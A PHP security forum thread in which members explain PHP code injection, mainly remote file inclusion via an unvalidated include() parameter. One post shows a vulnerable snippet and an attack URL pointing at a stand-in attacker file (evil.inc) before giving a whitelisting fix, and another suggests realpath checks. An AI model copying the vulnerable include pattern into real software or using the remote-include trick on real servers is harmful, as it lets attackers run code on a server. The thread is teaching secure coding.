PHP Injection

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

PHP Injection

Post by fambi »

Hi everyone,

I'm new to the forum and thank you all for providing this security forum.

I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?

Thanks.
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

possible yes, but for your scripts to actually run that it, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks feyd.

(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be a prepend to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous is they know enough information to be capable of accurately guessing your webroot and lower directory paths.

Simple example:

You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).

Code: Select all

// load database connection

if(isset($_GET['page']) && !empty($_GET['page'])) {
	include($_GET['page'] . '.inc');
} else {
	include('index.inc');
}

exit;
Now the attacker could simple store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):

http://www.yourserver.com/index.php?pag ... m/evil.inc

Result?

You include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.

Fix?

Check all user variables.

Code: Select all

// load database connection

$clean = array(); // store filtered variables separately

// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
	$clean['page'] = $_GET['page'];
} else {
	$clean['page'] = 'index';
}

if($clean['page']) include($clean['page'] . '.inc');

exit;
The solution here is to only allow alphabetic characters in the values - negating slash/period/colon characters means no url will be accepted to taint our script...
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks for the input.
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

- I usually build up a $filelocation that contains the page location.
- Then i check if the file exists and if it's readable.
- Then i check if the realpath of the location is a subpath of my $base_path (avoid most of the ../ tricks).
fambi
Forum Newbie
Posts: 18
Joined: Sun Apr 02, 2006 12:12 am

Post by fambi »

Thanks.
Post Reply